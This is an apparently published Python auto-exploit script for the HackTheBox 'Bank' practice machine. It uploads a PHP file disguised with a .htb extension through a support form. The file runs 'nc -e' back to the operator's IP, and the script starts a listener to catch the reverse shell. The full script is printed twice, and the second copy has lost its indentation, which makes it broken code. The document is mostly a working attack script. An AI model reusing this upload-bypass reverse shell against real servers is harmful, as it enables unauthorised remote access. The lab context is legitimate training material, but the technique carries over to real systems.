dipa96/htb_bank.py

## htb_bank.py
#!/usr/bin/python3.9

"""
htb_bank.py
Author: Donato Di Pasquale (dipa)
Description: Auto-Root Python script for HTB Bank machine from HackTheBox
Tech Stack Info: Support python3.9 and below
Usage: sudo python3.9 htb_bank.py -t <target> -i <your ip>
"""

import argparse
import requests
from bs4 import BeautifulSoup, Comment
import secrets
import subprocess
import threading
import time
import colorama
from colorama import Fore

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

def parse_arguments():
    parser = argparse.ArgumentParser(description="HackTheBox Bank Exploit, run this exploit as root")
    parser.add_argument("-t", "--target", type=str, help="")
    parser.add_argument("-i", "--ips", type=str, help="Your Host")
    args = parser.parse_args()
    return args

"""
1. Check if host on port 80 is reachable. -> checkHost()
2. Setting up bank.htb in /etc/hosts and delete them after script end. -> writeEtcHosts(args)
"""

def checkHost(args):
    print(Fore.YELLOW + "[DEBUG] Target entered: " + args.target + Fore.RESET)
    print(Fore.YELLOW + "[DEBUG] Send request to http://" + args.target + Fore.RESET)

    req = requests.get("http://" + args.target, timeout=5)

    if req.status_code == 200:
        print(Fore.GREEN + "[OK] " + args.target + " Target status code 200 OK" + Fore.RESET)
    else:
        print(Fore.RED + "[ERROR] Target Not Found" + Fore.RESET)
        return 1

def writeEtcHosts(args):

    dns = "bank.htb"
    print(Fore.YELLOW + "[DEBUG] Try to setting up new dns record " + dns + " in /etc/hosts file")

    try:
        hosts = open("/etc/hosts", "a")
        hosts.write(args.target + "\t" + dns + "\n")
    except Exception  as e:
        print(Fore.RED + "[ERROR]", type(e).__name__)
        if type(e).__name__ == "PermissionError":
            print(Fore.RED + "[ERROR] Run this exploit as root!")
    finally:
        print(Fore.GREEN + "[OK] " + args.target + " successful added to /etc/hosts" + Fore.RESET)

    return dns

"""
3. Print foothold in HTML. -> findingFoothold(args, dns)
4. Load reverse shell in file upload (.htb extension). -> exploit(args,dns)
5. Reverse Shell. -> exploit(args,dns)
"""

def findingFoothold(args, dns):

    # Don't follow redirects
    req = requests.get("http://" + dns + "/support.php", allow_redirects=False)
    soup = BeautifulSoup(req.text, 'html.parser')
    comments = soup.find_all(string=lambda string: isinstance(string, Comment))

    for comment in comments:
        if "[DEBUG]" in comment:
            print(Fore.BLUE + "[INFO] Suspicious comment in HTML: " + comment + Fore.RESET)

def exploit(args,dns):

    print(Fore.YELLOW + "[DEBUG] Setting up PHP Reverse Shell" + Fore.RESET)
    fileName = secrets.token_hex(nbytes=4) + ".htb"
    print(Fore.YELLOW + "[DEBUG] Load file: " + fileName + Fore.RESET)

    malicious_file = ("<?php exec(\'nc -e /var/htb/bin/emergency " + args.ips + " 1337\') ?>")

    file = open(fileName,"w")
    file.write(malicious_file)
    file.close()

    print(Fore.YELLOW + "[DEBUG] Setting up HTTP POST Request" + Fore.RESET)
    files = {'fileToUpload': open(fileName,'rb')}
    values = {'title':"test", 'message':'test', 'submitadd':''}
    headers = {'Content-type': 'application/x-php'}

    print(Fore.YELLOW + "[DEBUG] Send payload and waiting for reverse shell..."+ Fore.RESET)
    req = requests.post("http://" + dns + "/support.php", files=files, data=values, verify=False)

    def run_listener():
        nc_command = "nc -lnvp 1337"
        nc_process = subprocess.Popen(nc_command, shell=True)
        nc_process.wait()

    def run_reverse():

        req = requests.get("http://" + dns + "/" + "/uploads/" + fileName)

    listener_thread = threading.Thread(target=run_listener)
    listener_thread.start()

    run_reverse()

def main():
    args = parse_arguments()
    checkHost(args)
    dns = writeEtcHosts(args)
    findingFoothold(args, dns)
    exploit(args,dns)

if __name__ == '__main__':
    main()

"""
Box URL: https://app.hackthebox.com/machines/Bank
Box writeup: https://0xdf.gitlab.io/2020/07/07/htb-bank.html
"""
	#!/usr/bin/python3.9

	"""
	htb_bank.py
	Author: Donato Di Pasquale (dipa)
	Description: Auto-Root Python script for HTB Bank machine from HackTheBox
	Tech Stack Info: Support python3.9 and below
	Usage: sudo python3.9 htb_bank.py -t <target> -i <your ip>
	"""

	import argparse
	import requests
	from bs4 import BeautifulSoup, Comment
	import secrets
	import subprocess
	import threading
	import time
	import colorama
	from colorama import Fore

	proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

	def parse_arguments():
	parser = argparse.ArgumentParser(description="HackTheBox Bank Exploit, run this exploit as root")
	parser.add_argument("-t", "--target", type=str, help="")
	parser.add_argument("-i", "--ips", type=str, help="Your Host")
	args = parser.parse_args()
	return args

	"""
	1. Check if host on port 80 is reachable. -> checkHost()
	2. Setting up bank.htb in /etc/hosts and delete them after script end. -> writeEtcHosts(args)
	"""

	def checkHost(args):
	print(Fore.YELLOW + "[DEBUG] Target entered: " + args.target + Fore.RESET)
	print(Fore.YELLOW + "[DEBUG] Send request to http://" + args.target + Fore.RESET)

	req = requests.get("http://" + args.target, timeout=5)

	if req.status_code == 200:
	print(Fore.GREEN + "[OK] " + args.target + " Target status code 200 OK" + Fore.RESET)
	else:
	print(Fore.RED + "[ERROR] Target Not Found" + Fore.RESET)
	return 1

	def writeEtcHosts(args):

	dns = "bank.htb"
	print(Fore.YELLOW + "[DEBUG] Try to setting up new dns record " + dns + " in /etc/hosts file")

	try:
	hosts = open("/etc/hosts", "a")
	hosts.write(args.target + "\t" + dns + "\n")
	except Exception as e:
	print(Fore.RED + "[ERROR]", type(e).__name__)
	if type(e).__name__ == "PermissionError":
	print(Fore.RED + "[ERROR] Run this exploit as root!")
	finally:
	print(Fore.GREEN + "[OK] " + args.target + " successful added to /etc/hosts" + Fore.RESET)

	return dns

	"""
	3. Print foothold in HTML. -> findingFoothold(args, dns)
	4. Load reverse shell in file upload (.htb extension). -> exploit(args,dns)
	5. Reverse Shell. -> exploit(args,dns)
	"""

	def findingFoothold(args, dns):

	# Don't follow redirects
	req = requests.get("http://" + dns + "/support.php", allow_redirects=False)
	soup = BeautifulSoup(req.text, 'html.parser')
	comments = soup.find_all(string=lambda string: isinstance(string, Comment))

	for comment in comments:
	if "[DEBUG]" in comment:
	print(Fore.BLUE + "[INFO] Suspicious comment in HTML: " + comment + Fore.RESET)

	def exploit(args,dns):

	print(Fore.YELLOW + "[DEBUG] Setting up PHP Reverse Shell" + Fore.RESET)
	fileName = secrets.token_hex(nbytes=4) + ".htb"
	print(Fore.YELLOW + "[DEBUG] Load file: " + fileName + Fore.RESET)

	malicious_file = ("<?php exec(\'nc -e /var/htb/bin/emergency " + args.ips + " 1337\') ?>")

	file = open(fileName,"w")
	file.write(malicious_file)
	file.close()

	print(Fore.YELLOW + "[DEBUG] Setting up HTTP POST Request" + Fore.RESET)
	files = {'fileToUpload': open(fileName,'rb')}
	values = {'title':"test", 'message':'test', 'submitadd':''}
	headers = {'Content-type': 'application/x-php'}

	print(Fore.YELLOW + "[DEBUG] Send payload and waiting for reverse shell..."+ Fore.RESET)
	req = requests.post("http://" + dns + "/support.php", files=files, data=values, verify=False)

	def run_listener():
	nc_command = "nc -lnvp 1337"
	nc_process = subprocess.Popen(nc_command, shell=True)
	nc_process.wait()

	def run_reverse():

	req = requests.get("http://" + dns + "/" + "/uploads/" + fileName)

	listener_thread = threading.Thread(target=run_listener)
	listener_thread.start()

	run_reverse()

	def main():
	args = parse_arguments()
	checkHost(args)
	dns = writeEtcHosts(args)
	findingFoothold(args, dns)
	exploit(args,dns)

	if __name__ == '__main__':
	main()

	"""
	Box URL: https://app.hackthebox.com/machines/Bank
	Box writeup: https://0xdf.gitlab.io/2020/07/07/htb-bank.html
	"""